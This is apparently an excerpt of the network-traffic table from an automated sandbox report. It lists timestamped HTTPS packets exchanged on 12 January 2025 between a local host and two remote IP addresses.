                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.764483929 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.765058041 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.765089989 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.765162945 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.765386105 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.765413046 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.765455961 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.775394917 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.775410891 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.775538921 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.775635004 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.781893015 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.782243967 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804172993 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804200888 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804223061 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804239035 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804245949 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804260015 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804294109 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804301023 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804322004 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804347038 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804440975 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804455996 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804477930 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.804513931 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.824696064 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.825742006 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.838778973 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908588886 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908639908 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908665895 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908691883 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908694983 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908704996 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908720016 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908731937 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908740997 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908757925 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908771992 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908791065 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908808947 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908819914 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908824921 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908843994 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908857107 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908870935 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908898115 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908915043 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908931971 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908946991 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908976078 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.908992052 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.909009933 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.909018993 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.909035921 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.909068108 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.909085989 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.909132004 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.909142017 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957595110 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957612038 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957644939 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957644939 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957679987 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957700968 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957712889 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957724094 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957726955 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957746983 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957755089 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957756996 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957776070 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957794905 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957803011 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957815886 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957825899 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957840919 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957858086 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957863092 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957873106 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957894087 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957925081 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957932949 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.957962990 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958003998 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958028078 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958074093 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958090067 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958097935 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958105087 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958120108 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958122969 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958131075 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958149910 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958157063 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958174944 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958188057 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958203077 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958234072 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958370924 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958477020 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958816051 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958832979 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958859921 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958925009 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958925009 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958950996 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.958973885 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959037066 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959069967 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959286928 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959299088 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959319115 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959337950 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959372997 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959398985 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959409952 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959414959 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959438086 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959439039 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959448099 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959469080 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959469080 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959501982 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959525108 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959542036 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959549904 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959559917 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959575891 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959580898 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:19.959620953 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:23.439203978 CET50124443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:23.439209938 CET44350124195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:23.440753937 CET50124443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:23.440757990 CET44350124195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:24.102137089 CET44350124195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:24.102215052 CET50124443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:24.102229118 CET44350124195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:24.102272987 CET50124443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:24.102293015 CET44350124195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:24.102344990 CET50124443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:24.103213072 CET50124443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:24.103220940 CET44350124195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.295984030 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.296179056 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.296195030 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.296266079 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.299587965 CET50115443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.299627066 CET44350115195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.849016905 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.849056005 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.849282980 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.849647999 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:26.849664927 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.517955065 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.518205881 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.519890070 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.519917011 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.520776987 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.520788908 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.520872116 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.520905972 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.521070957 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.521106958 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.521895885 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.521935940 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.522084951 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:27.522106886 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.055455923 CET44350067162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.055627108 CET44350067162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.055831909 CET50067443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.063911915 CET44350068162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.063996077 CET44350068162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.064177990 CET50068443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.600656033 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.600755930 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.600759029 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.600811005 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.601053953 CET50134443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.601085901 CET44350134195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.645960093 CET50137443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.645993948 CET44350137195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.646066904 CET50137443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.646282911 CET50137443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.646298885 CET44350137195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.698791981 CET50067443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.698817015 CET44350067162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.698859930 CET50068443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.698888063 CET44350068162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.315275908 CET44350137195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.315485954 CET50137443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.315853119 CET50137443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.315881014 CET44350137195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.317589045 CET50137443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.317604065 CET44350137195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:30.010446072 CET44350137195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:30.010541916 CET44350137195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:30.010554075 CET50137443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:30.010623932 CET50137443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:30.010768890 CET50137443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:30.010801077 CET44350137195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:30.012270927 CET50142443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:30.012326002 CET44350142195.201.141.106192.168.2.5
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.825932980 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.825949907 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.827457905 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.827696085 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.827764988 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.827990055 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.828107119 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.828223944 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.828301907 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921408892 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921426058 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921439886 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921446085 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921979904 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.922116041 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.924140930 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.925323963 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.926243067 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.926276922 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.926422119 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.937591076 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.937783003 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.015418053 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.041074038 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.648195028 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.648260117 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.690757990 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.691030979 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.693511009 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.693614006 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.695583105 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.695653915 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.742860079 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.744002104 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.744328976 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.744945049 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.772337914 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.785320044 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.786070108 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.786535025 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.786845922 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.787882090 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.788506985 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.788691998 CET44365234162.159.61.3192.168.2.5
